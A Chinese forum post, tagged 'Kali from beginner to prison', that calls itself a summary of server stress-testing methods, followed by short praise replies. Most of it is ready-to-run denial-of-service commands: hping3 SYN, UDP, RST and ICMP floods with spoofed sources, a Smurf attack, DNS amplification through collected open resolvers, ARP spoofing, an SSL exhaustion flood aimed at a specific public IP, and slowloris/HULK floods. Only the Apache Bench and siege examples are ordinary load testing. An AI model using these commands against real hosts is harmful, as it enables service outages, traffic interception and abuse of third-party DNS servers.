代码疯子 - IT技术交流论坛-无限Perfect,追求梦想

 找回密码
 立即注册

用百度帐号登录

只需两步,快速登录

QQ登录

只需一步,快速开始

搜索
热搜: 教程 软件 源码
查看: 63|回复: 13

[Kali从入门到入狱] 常见的压力测试方式总结

[复制链接]

101

主题

111

帖子

173

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
173
发表于 2020-9-3 23:00:59 | 显示全部楼层 |阅读模式
0x0 前言
    平时我们也会进行一些压力测试,来确认服务器的稳定性,以保证在极多用户访问的时候,服务器依然能够运行,下面我简单介绍几种常见的压力测试方法。

0x01局域网攻击
1 hping3 攻击
SYN flood:

  1. hping3 -S --flood -V 192.168.2.129
  2. hping3 -S --flood -V -p TARGET_PORT TARGET_SITE
  3. hping3 -c 20000 -d 120 -S -w 64 -p TARGET_PORT --flood --rand-source TARGET_SITE
复制代码



UDP Flood:
  1. hping3 -S -U --flood -V --rand-source 192.168.2.130

  2. hping3 --flood --rand-source --udp -p TARGET_PORT TARGET_IP
复制代码


TCP FIN Flood:
  1. hping3 --flood --rand-source -F -p TARGET_PORT TARGET_IP
复制代码



TCP RST Flood:
  1. hping3 --flood --rand-source -R -p TARGET_PORT TARGET_IP
复制代码



PUSH and ACK Flood:
  1. hping3 --flood --rand-source -PA -p TARGET_PORT TARGET_IP
复制代码



ICMP and IGMP Floods:
  1. hping3 --flood --rand-source -1 -p TARGET_PORT TARGET_IP
复制代码



Smurf Attack:

  1. hping3 --icmp --spoof TARGET_IP BROADCAST_IP
复制代码



DNS Amplification:

收集当前网段的DNS服务器:
  1. ./tsunami -o recursive_dns.txt -l 4 -e 172.0.0.0/8
复制代码



攻击目标IP:
  1. ./tsunami -s TARGET_IP -n pentest.blog -p 3 -f recursive_dns.txt
复制代码

  1. netstress.fullrandom -d TARGET_DNS_SERVER -a dns -t a -n 4 -P 53
复制代码





参考链接:https://pentest.blog/how-to-perform-ddos-test-as-a-pentester/



2 arpspoof攻击
ifconfig

  1. fping -asg 10.10.167.0/24                    #得出局域网结构
  2. arpspoof -i eth0 -t 10.10.167.129 10.10.167.127
复制代码



0x02 互联网压测
1thc-ssl-dos ssl加密压测

  1. root@kali:~# thc-ssl-dos -l 1000 --accept 103.235.46.39:443
复制代码


2 T50 交换路由协议攻击
  1. root@kali:~# t50 --flood 192.168.2.127
复制代码



# 备注这个压力测试能过针对各种路由协议协议,也可以进行TCP/UDP协议进行攻击,由于篇幅有限,这里只是简单点一下这些功能。希望同学们能够对对于其中的参数和协议进行多谢的探索,多折腾。

3 inviteflood 防洪攻击
  1. root@kali:~# inviteflood eth0 5000 example.local 192.168.1.5 1000
复制代码


4 siege 用户攻击
  1. root@kali:/# leafpad /root/batchaccess#新建文件,写入下面的语句
  2. siege -i -c 300 -r 10 -t 2M -b -v -f /root/blog.txt
  3. root@kali:/# crontab -u root /root/batchaccess

  4. root@kali:/# leafpad /var/log/siege.log
  5. root@kali:/# cat /var/log/syslog |grep "siege"
复制代码



5 slow HTTP DoS 攻击
  1. root@kali:~# slowhttptest -c 1000 -H -g -o slowhttp -i 10 -r 200 -t GET -u http://192.168.1.202/index.php -x 24 -p 3

  2. root@kali:~# nmap -T5 -v --max-parallelism 600000 --script http-slowloris 192.168.1.202#使用nmap 的脚本扫描功能。

  3. root@kali:~# python hulk.py -site http://TARGET.com/test/

  4. root@kali:~# ./slowloris.pl -dns TARGET_URL -port 80 -num 200 -timeout 30

  5. root@kali:~# mz -A rand -B TARGET_DNS_SERVER -t dns "q=pentest.blog" -c 10000000
复制代码





6 ab  ---apache bench
① 无需登录
  1. cd  C:\apache\Apache24\bin
  2. ab -n 100 -c 10 http://test.com/
复制代码



② 需要登录
如果只用到一个Cookie,那么只需键入命令:
  1. ab -n 100 -C key=value http://test.com/
复制代码


如果需要多个Cookie,就直接设Header:
  1. ab -n 100 -H “Cookie: Key1=Value1; Key2=Value2” http://test.com/
复制代码


欢迎光临IT技术交流论坛:https://www.daimafengzi.com
省钱君,您的省钱专家:https://www.sqjun.com

0

主题

6

帖子

2

积分

菜鸡代码

Rank: 1

积分
2
发表于 2020-9-7 15:58:29 | 显示全部楼层
楼主很有经验啊!
欢迎光临IT技术交流论坛:https://www.daimafengzi.com
省钱君,您的省钱专家:https://www.sqjun.com
回复

使用道具 举报

0

主题

8

帖子

2

积分

菜鸡代码

Rank: 1

积分
2
发表于 2020-9-9 12:24:18 | 显示全部楼层
写得实在太好了,我唯一能做的就是默默顶贴!
欢迎光临IT技术交流论坛:https://www.daimafengzi.com
省钱君,您的省钱专家:https://www.sqjun.com
回复

使用道具 举报

0

主题

23

帖子

7

积分

菜鸡代码

Rank: 1

积分
7
发表于 2020-9-10 12:23:25 | 显示全部楼层
楼主人气很旺!
欢迎光临IT技术交流论坛:https://www.daimafengzi.com
省钱君,您的省钱专家:https://www.sqjun.com
回复

使用道具 举报

0

主题

6

帖子

2

积分

菜鸡代码

Rank: 1

积分
2
发表于 2020-9-15 04:57:40 | 显示全部楼层
感谢您的宝贵建议,我们会努力争取做得更好!
欢迎光临IT技术交流论坛:https://www.daimafengzi.com
省钱君,您的省钱专家:https://www.sqjun.com
回复

使用道具 举报

1

主题

12

帖子

4

积分

菜鸡代码

Rank: 1

积分
4
发表于 2020-9-19 22:45:54 | 显示全部楼层
楼主英明!
欢迎光临IT技术交流论坛:https://www.daimafengzi.com
省钱君,您的省钱专家:https://www.sqjun.com
回复

使用道具 举报

1

主题

15

帖子

5

积分

菜鸡代码

Rank: 1

积分
5
发表于 2020-9-22 07:01:22 | 显示全部楼层
楼主是一个神奇的青年!
欢迎光临IT技术交流论坛:https://www.daimafengzi.com
省钱君,您的省钱专家:https://www.sqjun.com
回复

使用道具 举报

0

主题

18

帖子

5

积分

菜鸡代码

Rank: 1

积分
5
发表于 2020-9-29 21:28:21 | 显示全部楼层
楼主说的我也略懂!
欢迎光临IT技术交流论坛:https://www.daimafengzi.com
省钱君,您的省钱专家:https://www.sqjun.com
回复

使用道具 举报

0

主题

17

帖子

5

积分

菜鸡代码

Rank: 1

积分
5
发表于 2020-10-1 07:33:52 | 显示全部楼层
楼上的心情不错啊!
欢迎光临IT技术交流论坛:https://www.daimafengzi.com
省钱君,您的省钱专家:https://www.sqjun.com
回复

使用道具 举报

0

主题

20

帖子

6

积分

菜鸡代码

Rank: 1

积分
6
发表于 2020-10-12 04:21:05 | 显示全部楼层
楼主的头像是本人吗?
欢迎光临IT技术交流论坛:https://www.daimafengzi.com
省钱君,您的省钱专家:https://www.sqjun.com
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册 用百度帐号登录

本版积分规则

QQ|Archiver|手机版|小黑屋|IT技术交流论坛 ( 闽ICP备13013206号-7 )

GMT+8, 2020-10-21 07:37 , Processed in 0.073715 second(s), 29 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表